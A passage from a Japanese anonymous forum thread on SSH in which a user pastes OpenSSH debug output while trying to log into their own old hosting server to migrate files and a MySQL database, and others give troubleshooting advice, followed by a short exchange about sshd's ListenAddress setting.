debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr

260:名無しさん＠お腹いっぱい。
15/06/06 12:58:59.06 .net
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: mac_init: found hmac-md5
debug1: kex: server->client aes128-cbc hmac-md5 none
debug2: mac_init: found hmac-md5
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug2: dh_gen_key: priv key bits set: 123/256
debug2: bits set: 511/1024
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent

261:名無しさん＠お腹いっぱい。
15/06/06 13:00:26.35 .net
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 2
debug1: Host '192.168.1.20' is known and matches the RSA host key.
debug1: Found key in /root/.ssh/known_hosts:2
debug2: bits set: 514/1024
debug1: ssh_rsa_verify: signature correct
debug2: kex_derive_keys
debug2: set_newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug2: set_newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug2: service_accept: ssh-userauth
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug2: key: /root/.ssh/identity ((nil))
debug2: key: /root/.ssh/id_rsa (0x98eda60)
debug2: key: /root/.ssh/id_dsa ((nil))
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: start over, passed a different list publickey,password,keyboard-interactive
debug3: preferred gssapi-with-mic,publickey,keyboard-interactive,password
debug3: authmethod_lookup publickey
debug3: remaining preferred: keyboard-interactive,password
debug3: authmethod_is_enabled publickey
debug1: Next authentication method: publickey
debug1: Trying private key: /root/.ssh/identity
debug3: no such identity: /root/.ssh/identity
debug1: Offering public key: /root/.ssh/id_rsa
debug3: send_pubkey_test

262:名無しさん＠お腹いっぱい。
15/06/06 13:05:16.38 .net
debug2: we sent a publickey packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Trying private key: /root/.ssh/id_dsa
debug3: no such identity: /root/.ssh/id_dsa
debug2: we did not send a packet, disable method
debug3: authmethod_lookup keyboard-interactive
debug3: remaining preferred: password
debug3: authmethod_is_enabled keyboard-interactive
debug1: Next authentication method: keyboard-interactive
debug2: userauth_kbdint
debug2: we sent a keyboard-interactive packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: userauth_kbdint: disable: no info_req_seen
debug2: we did not send a packet, disable method

263:名無しさん＠お腹いっぱい。
15/06/06 13:07:12.09 .net
debug3: authmethod_lookup password
debug3: remaining preferred:
debug3: authmethod_is_enabled password
debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
Connection closed by 192.168.1.20
以上です

264:名無しさん＠お腹いっぱい。
15/06/06 14:52:34.47 .net
これまで旧筐体にログインしたことはないそうだけど、
(Q1)旧筐体のredadminのパスワードは分かっているのか？
debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
パスワードが違っているのでは？
(Q2)旧筐体にどうやってデータをアップロードしていたのか？
FTPやWebDAVなどを使っていたのなら、新筐体からポートフォワードでデータをダウンロードできるかも。

265:名無しさん＠お腹いっぱい。
15/06/06 16:33:59.03 .net
>>264
本当にありがとうございます。
パスワード以外の可能性はなさそうですか？
(Q2)
これまで普通に使用していたサーバーが攻撃を受けて、ネットワークから隔離されてしまったんです。
戻す事はセキュリティ上出来ないから、筐体変更が必要と言われました。
それで新筐体を用意してもらったところ、旧筐体→新筐体へのデータ移行はサポート外と言われました。
(Q1)
昨日電話で問い合わせた時は、新筐体と同じと言われましたが、怪しいです。
旧筐体のローカルIPも後日訂正されましたし。
1日1項目しか進ませてくれませんｗ
因みに昨日の進歩は「iptables設定解除」でした。
これでパスワードが訊かれる所まで辿り着けました。
週末は休みなので、運が良ければ月曜の夜にパスワードを教えて頂けるかもしれません。

266:名無しさん＠お腹いっぱい。
15/06/06 18:25:09.33 .net
>>265
(Q2)旧筐体にどうやってデータをアップロードしていたのか？
というのは、普通に使用していたという、その内容を聞いています。
例えばWordPressならWordPressの機能を使ってデータをダウンロードできるのではないですか？
新筐体でSSHが使えるのなら、ポートフォワード機能を使って旧筐体のWordPressにアクセスできる可能性があります。

267:名無しさん＠お腹いっぱい。
15/06/06 19:29:15.51 .net
>>266
FTPです。
WordPressは使ってないです。
ポートフォワード機能というのはパスワードなしでアクセス出来るんですか？

268:名無しさん＠お腹いっぱい。
15/06/06 20:44:13.35 .net
>>267
旧筐体にSSHでログインするのは難しそうなので、データを取り出すために
他の方法で入れないかということです。
FTPを使っていたのなら、新筐体で
ftp 旧筐体のIP
とやってみたらどうでしょうか。
FTPでログインできるかもしれません。
ポートフォワードはSSHの機能で、手元のPCからは新筐体にアクセスし、
新筐体のSSHDが、そのアクセスを別のサーバー(今の場合は旧筐体)へ
中継してアクセスするものです。
旧筐体で使っていたのがWebアプリなら、この方法で手元のPCから
旧筐体にアクセスできるかも、と考えたのです。

269:名無しさん＠お腹いっぱい。
15/06/06 23:06:48.59 .net
>>268
ありがとうございます
ですが、その前に旧筐体にSSH接続する事が出来ました
ただ、ディレクトリが見つけられません

270:名無しさん＠お腹いっぱい。
15/06/07 03:14:56.19 .net
お陰様でファイルの移行は無事出来ました。
しかし肝心のmysqlが接続出来ません。。

271:名無しさん＠お腹いっぱい。
15/06/07 05:41:52.90 .net
>>270
おまえさmysqlがどうこう言う前にみんなに説明することがあるだろ
どうして今まではsshで接続できなかったのか

272:名無しさん＠お腹いっぱい。
15/06/07 07:22:18.88 .net
sshで入れるならmysqldumpすりゃ良いんだろ

273:名無しさん＠お腹いっぱい。
15/06/07 13:10:39.18 .net
>>270
dbのディレクトリごとtar ballにしてもってきちゃいなよ
そうしたら、手元のマシンでいくらでもできると思うけど

274:名無しさん＠お腹いっぱい。
15/06/07 16:40:43.34 .net
もうスレ違い

275:名無しさん＠お腹いっぱい。
15/06/07 17:14:18.66 .net
>>271
失礼しました
旧筐体のパスワードが分かった為です
>>272
どうしてもエラーが出てしまいます
ERROR 1045 (28000): Access denied for user '*****'@'localhost' (using password: YES)

276:名無しさん＠お腹いっぱい。
15/06/07 17:46:36.57 .net
おまえら優しすぎ

277:名無しさん＠お腹いっぱい。
15/06/07 18:10:55.42 .net
sshの話じゃないだろ
よそでやれよ

278:名無しさん＠お腹いっぱい。
15/06/08 08:03:56.92 .net
>>275
そのdbとwebアプリケーションで動いていたのなら、それこそmysqlのdbディレクトリを、まんま新筐体に持って行けば動くだろ？
mysqlのバージョンを合わせりゃこれでも動くぞ

279:名無しさん＠お腹いっぱい。
15/06/08 09:31:20.71 .net
それは、mysqlのファイルにリードパーミッションが無けりゃ出来ない。

280:名無しさん＠お腹いっぱい。
15/06/08 15:41:30.92 .net
>>273
mysqlディレクト毎をtar.gz圧縮して、新筐体に送信、展開したらPLESK毎動かなくなってしまいました

ERROR: PleskMainDBException
MySQL query failed: Unknown column 'ip_dual_stack' in 'field list'
0: common_func.php3:220
db_query(string 'SELECT login, type, ip_address, ip_dual_stack FROM sessions WHERE sess_id=""')
1: class.Session.php:420
Session->init(string '*.*.*.*')
2: auth.php3:197

281:名無しさん＠お腹いっぱい。
15/06/08 16:27:07.75 .net
なぜ稼働中のサーバー(だよな？)でやったのか

282:名無しさん＠お腹いっぱい。
15/06/08 17:07:13.47 .net
>>280
そういうのはMySQLを止めてやるんだ

283:名無しさん＠お腹いっぱい。
15/06/08 17:31:26.02 .net
ﾜﾛﾀww

284:名無しさん＠お腹いっぱい。
15/06/08 17:36:25.99 .net
>>281-283
稼働中のサーバーでやってしまいました(´Д⊂ ﾓｳﾀﾞﾒﾎﾟ
しかもMySQLのバージョンが違ったかもしれません
PLESKのバージョンも違うので
これはサーバー会社に頼んで再インストールしかないですかね？

285:名無しさん＠お腹いっぱい。
15/06/08 20:27:04.51 .net
サーバー会社も災難だな
このスレにも災難だが

286:名無しさん＠お腹いっぱい。
15/06/09 19:13:39.75 .net
>>284
新筐体のディレクトリはバックアップしてなかったのかよ...

287:名無しさん＠お腹いっぱい。
15/09/20 21:08:00.32 .net
SSHとSSLの違いを教えて下さい。

288:名無しさん＠お腹いっぱい。
15/09/22 08:42:06.45 .net
SSレジスタの上位バイトと下位バイト

289:名無しさん＠お腹いっぱい。
15/09/22 09:51:04.82 .net
OpenSSHとOpenSSL
作者が同じと思っていたが実は違うのだ。

290:名無しさん＠お腹いっぱい。
15/09/24 19:52:10.60 .net
sshでクライアントからログイン出来るPCを制限しようとして
etc/ssh/sshd_configに次の一行を付け加えました
ListenAddress 192.168.1.100
そうしたら192.168.1.100からsshで接続できなくなりました
OS: FreeBSD9.2
/var/log/messagesの内容は
error: Bind to port 22 on 192.168.1.100 failed: Can't assign requested address.
fatal: Cannot bind any address.
何が原因でしょうか、よろしくお願いします

291:名無しさん＠お腹いっぱい。
15/09/24 20:30:08.37 .net
Listenの意味を勘違いしてるｗ

292:名無しさん＠お腹いっぱい。
15/09/26 20:15:26.90 .net
自己解決、ていうか・・・
ListenAddressを設定するのは
NICが複数有るような場合、どのNICで待ち受けるか、ですね
それをクライアントのIPにしたら、接続できないのはあたりまえでした
お騒がせしました、消えます

次ページ